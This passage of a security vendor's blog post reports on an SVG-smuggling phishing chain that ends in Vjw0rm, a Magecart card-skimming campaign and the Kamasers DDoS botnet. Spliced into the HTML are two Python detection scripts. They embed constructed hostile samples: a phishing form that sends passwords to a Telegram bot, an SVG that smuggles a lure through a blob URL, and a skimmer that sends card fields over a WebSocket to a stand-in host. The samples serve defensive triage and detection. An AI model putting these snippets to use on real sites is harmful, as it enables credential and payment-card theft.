LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;observed&nbsp;a phishing campaign targeting organizations in&nbsp;<strong>Colombia<\/strong>, particularly in&nbsp;<strong>government, finance, oil and gas, and healthcare<\/strong>. 
The attackers use Spanish-language phishing emails with an attached&nbsp;<strong>SVG file<\/strong>&nbsp;that acts as more than an image: it&nbsp;contains&nbsp;embedded JavaScript that rebuilds the next attack stage locally through&nbsp;<strong>SVG smuggling<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1024x538.jpeg\" alt=\"SVG smuggling campaign details revealed by ANY.RUN\" class=\"wp-image-19732\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1024x538.jpeg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-300x158.jpeg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-768x403.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1536x806.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-2048x1075.jpeg 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-370x194.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-270x142.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-740x389.jpeg 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>SVG smuggling campaign details revealed by ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of downloading a payload from an external source right away, the SVG uses a&nbsp;<strong>blob URL<\/strong>&nbsp;to generate an intermediate HTML lure inside the browser. 
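The two attachment tricks described so far, the PDF-named HTML file in section 4 that POSTs a password form to the Telegram Bot API and the SVG here that rebuilds an HTML lure from base64 and opens it through a blob: URL, share the same static tells. The Python script below is an added triage example, not ANY.RUN's tooling or anything taken from the campaigns themselves: the two samples, their filenames, the bot-token placeholder and the lure markup are constructed for illustration, and the indicator list is a starting point, not a signature set.

```python
import base64
import re

# Constructed sample 1: an HTML attachment named like a PDF. The form posts the
# harvested credentials to the Telegram Bot API (the bot token is a placeholder).
PDF_HTM = """<html><body>
<form id="login"><input name="email"><input name="password" type="password"></form>
<script>
document.getElementById("login").onsubmit = async (e) => {
  e.preventDefault();
  const creds = JSON.stringify(Object.fromEntries(new FormData(e.target)));
  await fetch("https://api.telegram.org/bot000000:PLACEHOLDER/sendMessage",
              {method: "POST", body: JSON.stringify({chat_id: "1", text: creds})});
};
</script></body></html>"""

# Constructed sample 2: an SVG whose script decodes a base64 HTML lure and opens it
# through a blob: URL, so no second-stage download is visible on the wire.
LURE_HTML = '<html><body><a download="Notificacion.zip" href="#">Descargar</a><script>alert(1)</script></body></html>'
SVG = f"""<svg xmlns="http://www.w3.org/2000/svg">
<text x="10" y="20">Documento</text>
<script type="text/javascript"><![CDATA[
var p = "{base64.b64encode(LURE_HTML.encode()).decode()}";
var b = new Blob([atob(p)], {{type: "text/html"}});
window.location = URL.createObjectURL(b);
]]></script></svg>"""

INDICATORS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "blob_url": re.compile(r"URL\.createObjectURL\s*\(|new\s+Blob\s*\(", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "outbound_request": re.compile(r"\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon", re.I),
    "credential_form": re.compile(r"type\s*=\s*[\"']password[\"']", re.I),
    "js_obfuscation": re.compile(r"String\.fromCharCode|\bunescape\s*\(|\beval\s*\(", re.I),
}
# Long base64-looking string literals are candidate smuggled payloads.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{40,}={0,2})[\"']")
DOC_THEMED_NAME = re.compile(r"pdf|invoice|factura|documento", re.I)
ACTIVE_CONTENT_EXT = {"htm", "html", "svg"}


def _decode_text(literal: str):
    """Decode a base64 literal to text, or None if it is not clean base64/UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_attachment(text: str, depth: int = 0, max_depth: int = 3) -> dict:
    """Collect indicators from the markup and recurse into base64 payloads that decode to markup."""
    found = {name for name, rx in INDICATORS.items() if rx.search(text)}
    nested = []
    if depth < max_depth:
        for literal in B64_LITERAL.findall(text):
            decoded = _decode_text(literal)
            if decoded and "<" in decoded:
                nested.append(scan_attachment(decoded, depth + 1, max_depth))
    return {"indicators": found, "nested": nested}


def all_indicators(report: dict) -> set:
    """Indicators from the outer file and every decoded layer beneath it."""
    out = set(report["indicators"])
    for child in report["nested"]:
        out |= all_indicators(child)
    return out


def verdict(filename: str, text: str) -> list:
    """Reasons to treat the attachment as malicious; an empty list means nothing was found."""
    reasons = []
    ext = filename.lower().rsplit(".", 1)[-1]
    if ext in ACTIVE_CONTENT_EXT and DOC_THEMED_NAME.search(filename):
        reasons.append("document-themed name on an active-content file type")
    report = scan_attachment(text)
    ind = all_indicators(report)
    if "script_tag" in ind and "blob_url" in ind:
        reasons.append("script builds content locally via blob: URL (smuggling)")
    if report["nested"]:
        reasons.append("base64 literal decodes to embedded markup")
    if "credential_form" in ind and ind & {"telegram_bot_api", "outbound_request"}:
        reasons.append("password form posts data out of band")
    if "telegram_bot_api" in ind:
        reasons.append("hard-coded Telegram Bot API endpoint")
    if "js_obfuscation" in ind:
        reasons.append("obfuscated JavaScript")
    return reasons


if __name__ == "__main__":
    for name, body in (("pdf.htm", PDF_HTM), ("Documento_fiscal.svg", SVG), ("logo.svg", "<svg/>")):
        print(name, "->", verdict(name, body) or "clean")
```

Run it against attachments pulled from the mail gateway before detonation: a non-empty verdict is the cue to sandbox the file, and the recursion through decoded base64 layers is what surfaces the smuggled HTML that a single-pass string search over the SVG would miss.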
That lure imitates a document-related workflow and creates a&nbsp;<strong>password-protected ZIP archive<\/strong>&nbsp;for the victim to open, pushing the attack forward while reducing obvious early network&nbsp;signals.&nbsp;<\/p>\n\n\n\n<p>This staged delivery makes the campaign harder to catch during&nbsp;initial&nbsp;triage. SVG smuggling, blob-generated content, and the later use of legitimate Windows components break the compromise into smaller artifacts that may&nbsp;look&nbsp;weak or unrelated on their own, slowing detection and investigation.&nbsp;<\/p>\n\n\n\n<p>Inside ANY.RUN Sandbox, analysts were able to reconstruct the full flow:&nbsp;<\/p>\n\n\n\n<p><strong>SVG smuggling \u2192 Blob-based HTML lure \u2192 Password-protected ZIP \u2192&nbsp;Notificacion&nbsp;Fiscal.js \u2192 radicado.hta \u2192 J0Ogv7Hf.ps1 \u2192 C2 communication<\/strong>&nbsp;<\/p>\n\n\n\n<p>That visibility helps security teams connect scattered artifacts faster, uncover hidden delivery stages, and confirm malicious activity before the intrusion progresses further.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch hidden delivery chains before they lead to compromise\n<br> Give your team <span class=\"highlight\">earlier visibility<\/span> into multi-stage attacks\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 
0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>The following Vjw0rm C2 response commands can be used as detection signals for active compromise in your environment:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cl \u2014 execution termination&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AW \u2014 active window data collection and exfiltration&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ex \u2014 PowerShell code execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SF \/ RF \u2014 base64 payload delivery, storage, and execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DL \u2014 file download from URL with optional execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DLF \u2014 file delivery via C2 with storage and execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Un \u2014 removal of persistence mechanisms and related artifacts&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">6. 
Active&nbsp;Magecart&nbsp;Campaign Hijacks&nbsp;eStores&nbsp;and Steals Card Data&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/banks-magecart-campaign\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed breakdown<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts uncovered an active&nbsp;<strong>Magecart&nbsp;campaign<\/strong>&nbsp;targeting e-commerce websites, with a notable concentration in&nbsp;<strong>Spain<\/strong>. In the observed cases, attackers hijacked checkout flows, replaced legitimate payment steps with fake interfaces, and stole card data through&nbsp;<strong>WebSocket-based exfiltration<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1024x1024.png\" alt=\"WebSocket exfiltration code\" class=\"wp-image-19733\" style=\"width:543px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1024x1024.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-300x300.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-150x150.png 150w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-768x768.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1536x1536.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-70x70.png 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-370x370.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-270x270.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-740x740.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>WebSocket exfiltration code<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>What makes this campaign especially dangerous is its durability. The operation remained active for more than&nbsp;<strong>24 months&nbsp;<\/strong>and&nbsp;relied on a large infrastructure of&nbsp;<strong>100+ domains<\/strong>, using staged payload delivery, fallback domains, and payment-page mimicry to stay operational and avoid disruption. In Spain-focused cases, the attackers notably abused&nbsp;<strong>Redsys-themed&nbsp;<\/strong>payment context to make the fraudulent flow appear legitimate.&nbsp;<\/p>\n\n\n\n<p>The campaign also stood out for how it blended card theft into trusted payment experiences. Instead of relying on a simple fake form, the malware dynamically adapted the checkout page, injected malicious elements, and transmitted stolen payment data outside normal HTTP flows, making detection harder for defenders and increasing fraud risk for banks and payment ecosystems.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/7e66942b-82f5-4dc7-9be3-b73ac0600fb1\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the full payment-skimming chain<\/a>&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"569\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1024x569.png\" alt=\"PayPlug\u00a0SAS payment window imitation displayed inside ANY.RUN sandbox\u00a0\" class=\"wp-image-19734\" 
srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1024x569.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-300x167.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-768x427.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1536x853.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-2048x1138.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-370x206.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-270x150.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-740x411.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>PayPlug&nbsp;SAS payment window imitation displayed inside ANY.RUN sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, analysts exposed the multi-stage delivery logic, malicious script injection, fake payment overlays, and WebSocket-based card data exfiltration. 
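To make this concrete for a merchant or PSP security team, the following Python check is an added example, not ANY.RUN's code and not the skimmer's: it baselines every script on a known-good copy of the checkout page, flags anything that later appears outside that baseline, looks inside unknown inline scripts for the behaviours a skimmer needs (payment-field hooks, input capture, an injected overlay, a WebSocket to push the data out), and emits a Content-Security-Policy whose connect-src leaves no room for a WebSocket to an unlisted host. The page markup, the injected skimmer and the .example hostnames are constructed for illustration.

```python
import hashlib
import re
from urllib.parse import urlparse

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)

# Behaviours a checkout skimmer needs: hook the card fields, capture what is typed,
# draw a fake payment step, and ship the data out over a WebSocket.
SKIMMER_SIGNS = {
    "websocket_exfil": re.compile(r"new\s+WebSocket\s*\(\s*[\"']wss?://", re.I),
    "card_field_hook": re.compile(r"card_?number|ccnum|cvv|cvc|expir", re.I),
    "input_capture": re.compile(r"addEventListener\s*\(\s*[\"'](input|keyup|change|submit)[\"']", re.I),
    "overlay_injection": re.compile(r"createElement\s*\(\s*[\"']iframe[\"']|position\s*:\s*fixed", re.I),
}

# Constructed known-good checkout page and the same page after a skimmer injection.
CLEAN_PAGE = """<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.psp.example/sdk.js"></script>
<script>window.checkoutConfig = {step: "payment", currency: "EUR"};</script>
</body></html>"""
SKIMMER = """<script src="https://cdn-redsys-static.example/pay.js"></script>
<script>(function(){var ws=new WebSocket("wss://stats-cdn.example/s");
document.querySelectorAll("input").forEach(function(i){i.addEventListener("input",function(){
if(/cardnumber|cvv/i.test(i.name)){ws.send(JSON.stringify({n:i.name,v:i.value}));}});});
var f=document.createElement("iframe");f.style.cssText="position:fixed;top:0;left:0";
document.body.appendChild(f);})();</script>
"""
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", SKIMMER + "</body>")
ALLOWED_HOSTS = {"js.psp.example"}  # the one third party the checkout legitimately talks to


def extract_scripts(html: str):
    """Yield (kind, identifier, body): external scripts by URL, inline ones by SHA-256 of their code."""
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            yield "external", src.group(1), ""
        else:
            yield "inline", hashlib.sha256(body.strip().encode()).hexdigest(), body


def build_baseline(html: str) -> set:
    """Identifiers of every script on a known-good copy of the checkout page."""
    return {ident for _, ident, _ in extract_scripts(html)}


def audit_checkout(html: str, baseline: set, allowed_hosts: set) -> list:
    """Report scripts absent from the baseline; unknown inline code is checked for skimmer signs."""
    findings = []
    for kind, ident, body in extract_scripts(html):
        if ident in baseline:
            continue
        if kind == "external":
            host = urlparse(ident).netloc  # empty for same-origin relative paths
            signs = ["host not allowlisted"] if host and host not in allowed_hosts else []
            findings.append(("external", ident, signs))
        else:
            signs = sorted(name for name, rx in SKIMMER_SIGNS.items() if rx.search(body))
            findings.append(("inline", ident[:12], signs))
    return findings


def csp_header(allowed_hosts: set) -> str:
    """Pin script and connection sources; wss:// is listed explicitly for the allowed hosts
    so WebSocket permission does not depend on how a schemeless host-source is matched."""
    hosts = " ".join(sorted(allowed_hosts))
    wss = " ".join(f"wss://{h}" for h in sorted(allowed_hosts))
    return (f"default-src 'self'; script-src 'self' {hosts}; "
            f"connect-src 'self' {hosts} {wss}; frame-ancestors 'none'")


if __name__ == "__main__":
    baseline = build_baseline(CLEAN_PAGE)
    for finding in audit_checkout(INJECTED_PAGE, baseline, ALLOWED_HOSTS):
        print(finding)
    print("Content-Security-Policy:", csp_header(ALLOWED_HOSTS))
```

The CSP line is the control that matters most here: a skimmer that has already landed on the page cannot open a WebSocket to a host that connect-src does not name, and with CSP reporting configured the violation report hands defenders the exfiltration endpoint. The baseline audit is the detection side, run on every deploy and on a schedule against the live page, since the injected script is rarely in the repository.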
That sandbox visibility helps security teams understand how the skimmer&nbsp;operates,&nbsp;identify&nbsp;related infrastructure faster, and strengthen detections against long-running payment theft campaigns.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">7.&nbsp;Kamasers: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed analysis<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN published a detailed technical analysis of&nbsp;<strong>Kamasers<\/strong>, a multi-vector&nbsp;<strong>DDoS botnet<\/strong>&nbsp;designed to carry out both application-layer and transport-layer attacks while also supporting follow-on payload delivery. The research shows how the malware&nbsp;operates, how it receives commands, and why it creates risk beyond disruption alone.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/232034c5-de22-4eb4-a3ab-62e58d041205?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See&nbsp;Kamasers&nbsp;behavior&nbsp;exposed<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"901\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-1024x901.png\" alt=\"Communication between the infected host and the C2 server\u00a0observed\u00a0inside ANY.RUN\" class=\"wp-image-19736\" style=\"width:470px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-1024x901.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-300x264.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-768x676.png 768w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-370x326.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-270x238.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-740x651.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Communication between the infected host and the C2 server&nbsp;observed&nbsp;inside ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside the sandbox, analysts&nbsp;observed&nbsp;the botnet retrieving command-and-control data, communicating with active infrastructure, executing DDoS-related commands, and in some cases downloading&nbsp;additional&nbsp;files for execution. This helps security teams confirm malicious&nbsp;behavior&nbsp;faster and understand whether an infected host is being used only for flooding activity or as part of a broader compromise.&nbsp;<\/p>\n\n\n\n<p>Kamasers&nbsp;supports multiple attack methods, including&nbsp;<strong>HTTP, TLS, UDP, TCP, and&nbsp;GraphQL-based flooding<\/strong>. 
In addition, it can act as a&nbsp;<strong>loader<\/strong>, which increases the risk of further malware delivery, data theft, or ransomware.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\"><span class=\"highlight\"> Reduce <\/span>the chance of data theft and financial loss\n<br> Help your team\u00a0<span class=\"highlight\">contain\u00a0threats<\/span> before the damage grows\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>Another notable finding was the botnet\u2019s resilient&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;design. 
Instead of depending on a single static C2 location,&nbsp;Kamasers&nbsp;uses legitimate public services such as&nbsp;<strong>GitHub Gist, Telegram, Dropbox, Bitbucket, and&nbsp;Etherscan&nbsp;<\/strong>to retrieve active command-and-control addresses, making disruption and early detection more difficult.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"198\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10.png\" alt=\"DDR links in the\u00a0Kamasers\u00a0codebase\" class=\"wp-image-19737\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-300x66.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-768x169.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-370x81.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-270x59.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-740x163.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>DDR links in the&nbsp;Kamasers&nbsp;codebase<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>For organizations, that means a single infected system can become both a source of external attacks and a foothold for deeper intrusion, increasing operational, financial, and reputational risk.&nbsp;<\/p>\n\n\n\n<p>To review related sandbox analyses and broader activity, use the following&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a 
href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1024x446.png\" alt=\"Kamasers\u00a0attacks displayed inside TI\u00a0Lookup\" class=\"wp-image-19738\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1024x446.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-768x335.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-740x322.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside 
